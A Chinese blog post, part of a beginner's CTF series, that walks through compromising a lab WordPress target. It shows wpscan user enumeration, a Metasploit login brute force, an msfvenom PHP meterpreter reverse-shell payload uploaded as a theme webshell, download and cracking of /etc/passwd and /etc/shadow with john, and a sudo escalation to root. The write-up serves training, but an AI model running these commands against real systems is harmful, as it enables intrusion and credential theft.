小白学习CTF第十二天-web安全暴力破解

最新推荐文章于 2024-01-10 20:45:11 发布
最新推荐文章于 2024-01-10 20:45:11 发布
阅读量806 收藏 1
点赞数 1
文章标签: linux 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbhh1139/article/details/105831693
版权

web安全暴力破解

在这里插入图片描述
在这里插入图片描述

信息探测

信息探测与之前的探测策略一样
在这里插入图片描述

深入挖掘

在这里插入图片描述
在这里插入图片描述

http://192.168.56.103/secret/

在这里插入图片描述

http://192.168.56.103/secret/wp-login.php

在这里插入图片描述
但是发现站点登录不上去,怎么办呢?
在这里插入图片描述
打不开的网页可以设置对应的站点,通过把相应的站点改为IP地址即可
gedit /etc/hosts
靶场IP 无法登录的站点
解析一下网页结构
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
之后就可以再次登陆了。
在这里插入图片描述

暴力破解

在这里插入图片描述
首先要查看用户名

wpscan

在这里插入图片描述

wpscan --url www.vtcsec.com/secret/ --enumerate u

在这里插入图片描述
得到了用户名以及密码了。
之后启动msfconsole

msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 
set pass_file /usr/share/wordlists/dirb/common.txt
set user admin
set targeturi /secret/
set rhosts IP
set username admin
run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

上传webshell获取控制权

在这里插入图片描述
在这里插入图片描述
制作一个对应的shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.17.128 lport=4444 -f raw

在这里插入图片描述

back
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.253.12
run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
run 之后像之前对应的网页上传webshell,等待反弹权限,这里就不介绍了。

http://192.168.253.20/secret/wp-content/themes/twentysevevteen/404.php
sysinfo
id

在这里插入图片描述

root权限

在这里插入图片描述
下载passwd以及shadow

download /etc/passwd    
download /etc/shadow

unshadow passwd shadow > cracked
john cracked

在这里插入图片描述
之后破解对应的用户名以及密码。
在这里插入图片描述
记得优化终端。

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
之后准备获取root权限。
在这里插入图片描述
但是这里并没有获取root权限,只是一个比普通用户权限,我们使用。

su - marlinspike
sudo -l
sudo bash

在这里插入图片描述
返回root权限了。
在这里插入图片描述

获取flag

在这里插入图片描述
在这里插入图片描述

总结

在这里插入图片描述

bbhh1139
关注
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
杨秀璋的专栏
10-30 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Powershell基础入门知识,涉及条件语句、循环语句、数组、函数 、字符串操作、注册表访问等。这篇文章将分享Web渗透的第一步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集。
CTF多功能密码破解(需java环境)
02-09
CTF的小工具,实用方便,可支持多种古典密码,多种编码方式。
python之WEB登录密码暴力破解
HTTP协议01
05-06 7718
原理:利用字典爆破进行破解 实验环境:本机Win10(python3.7环境)、虚拟机Win2003(搭建DVWA网站) 工具:火狐浏览器、Burp Suite 实现步骤: 1、获取正常登录时需要提交的数据信息。 Burp Suite开启抓包,浏览器范文Dvwa登录页面,按F12开启网络数据查看器,登录dvwa. 可知:username、passwo...
web-ctfctf-pikachu-暴力破解
一个努力生活的人的博客
06-11 2973
文章目录暴力破解(Brute Force)1.基于表单的暴力破解 burpsuite配置 火狐浏览器需要导入证书 如果无法抓到127.0.0.1的包,可以试试以下操作 暴力破解(Brute Force) 1.基于表单的暴力破解 使用burpsuite工具中的intruder模块进行暴力破解:intruder模块使用教程 先随便输入一个username和password 利用burpsuite进行抓包 将抓到的包导入intruder模块(在空白处右键,选择send to intruder)
GJCTF模拟题之python暴力破解网站管理员密码
单核CPU的小朋友的博客
11-02 4万+
题目地址:http://www.czlgjbbq.top/GJCTF/brute.php php源码: <?php error_reporting(0); session_start(); if(empty($_COOKIE['f14g']) || empty($_SESSION['token'])){ $rand_number = rand(10000,99999); se...
Python 爆破web登录实验笔记
m0_60823533的博客
05-15 1194
总体原理:多次发送密码尝试穷举爆破 具体流程分析: 1.抓取web发送账号密码数据接口 2.自动识别验证码 3.获取到密码和验证码结果,通过python模拟无限次发送 4.分析返回结果 详细流程: (1).抓取web发送账号密码数据接口 网站登录界面示例: 通过抓取提交数据接口发现有用户名,密码,验证码三个数据,这里需要分析第三个数据怎么获取,直接打开云代码查看,看到了获取验证码的接口! 但是经过测试始终提示验证码错误,又回来分析验证码接口,终于反复查看发现这
BugkuCTF-WEB-第43题到第52题
Alita_lxz的博客
11-04 1198
BugkuCTF-WEB-第43题到第52题
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
杨秀璋的专栏
01-13 1万+
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台获取邀请码、注册过程。本文将分享Web渗透三道入门题目,它们包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。基础性文章,希望对您有所帮助!
ctf训练 web安全暴力破解
qq_43799246的博客
12-03 1094
ctf训练 web安全暴力破解 暴力破解漏洞介绍 穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。 Web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果。 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.com/s/1jitlWbjJHfyzfvPEBVDhUw 提
CTF-web暴力破解
IT小学子的博客
05-03 812
web暴力破解 针对wordpress网站 use auxiliary/scanner/http/wordpress_login_enum 为当前wordpress模块 set username admin 网站用户名 set pass_file /usr/share/wordpress/dirb/common.txt 密码字典位置 set targeturl...
CTFd运维-CTFd平台搭好后,遇到网页访问慢,卡顿非常厉害的解决方法
weixin_43880435的博客
07-14 3360
最近在部署了一台CTF在服务器,用于伙伴们练习, 但发现可以正常访问,但访问非常卡顿,页面跳转也要等上10-20秒,体验很不爽 百度查找了很多资料也没有解决此问题, 最后终于找到通过多方查找,在同事的提醒下,找到了原因:CTFd中的代码中引用了国外网站的css,而网站可能是被墙了, 不能访问,每次打开页面的时候,都要调用这个CSS,请求失败后,才会加载其它页面. 解决办法: 查看CTFd的源码,发现fonts.dev.css和fonts.min.css引用了此网站的all.css. f..
“百度杯”CTF比赛 十月场 Not Found
feng的博客
10-01 1964
前言 有一说一,这题还是挺阴间的。不过自己也是学习了新的姿势。 WP 进入之后提示404.php没有,然后扫一下目录发现1.php,访问也没有flag,再直接访问404.php是haha(出题人出来挨打)。之后进行一些尝试均已失败告终,去看了看WP。 首先就是直接访问网站的时候,响应头里有一个x-method是haha: 原来这是提示我们要换请求方式(出题人在哪????haha 什么呢????) HTTP请求就那几种方式,挨个试,在试到OPTIONS的时候出现了重定向: 点一下关注重定向: 发现请求变
BugkuCTF-WEB部分题解(一)
flying_bird2019的博客
03-04 2313
域名解析 访问 flag.baidu.com 提示:找不到网站 无法进行DNS解析 直接访问123.206.87.240 返回400 Bad Request 查询400错误 详情 两种方法解析域名 1.修改hosts文件: 直接在hosts文件中添加flag.bugku.com 120.24.86.145 2.修改头信息: 用burpsuit抓包修改host头信息为flag.bugku...
CTF题记——详谈两道Web
m0re's blog
11-02 1177
前言 最近学校也在招新,基本没什么时间做题,最近也很少发博客。就写几道题来充充数吧。 正文 fakebook 我的思路呢,只有一点沾边了,记一下现在的思考: 注册了一个username就找不到其他信息了,然后考虑了源码泄露。找了robots.txt,发现了一个user.php.bak,访问得到泄露的文件。是这样 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; p
ctf中常见php特性
最新发布
2301_79863884的博客
01-10 1183
本地文件包含: 本地文件包含漏洞是指攻击者通过应用程序中的,成功包含本地系统文件,并在其中执行恶意代码。攻击者可以利用该漏洞读取敏感文件、执行系统命令或将Web服务器配置文件修改为恶意内容。以下是一个示例上述示例中,应用程序从URL参数中获取文件名并将其包含到代码中。攻击者可以通过在URL中添加恶意文件路径来访问未经授权的文件。远程文件包含: 远程文件包含漏洞是指攻击者通过应用程序中的输入点,成功包含远程服务器上的文件,并在其中执行恶意代码。
南邮CTF--bypass again
weixin_34288121的博客
05-18 500
南邮CTF--bypass again 提示:依旧弱类型,来源hctf 解析: 源代码: if (isset($_GET['a']) and isset($_GET['b'])) {​ if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) == md5($_GET['b'])) die('Flag: '.$flag)...
CTF里面的WEB题的一些解决思路
热门推荐
DALE1186487104的博客
04-19 4万+
CTF里面解决WEB题的一些常用思路:(福利:末尾有视频链接)如图( 十八罗汉)                                                                                        PS:(下文的序列号是对图片中序列号的一些补充)WEB题中常用的工具                                    (1...
网络安全自学笔记:实验吧CTF实战-WEB渗透与隐写术解析
"网络安全自学篇, CTF实战, WEB渗透, 隐写术, Chrome浏览器, Jother编码, BurpSuite, SQLMAP, Fiddler" 在网络安全领域,尤其是对于初学者来说,了解并实践CTF(Capture The Flag)实战是一种很好的学习方式。"04....
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值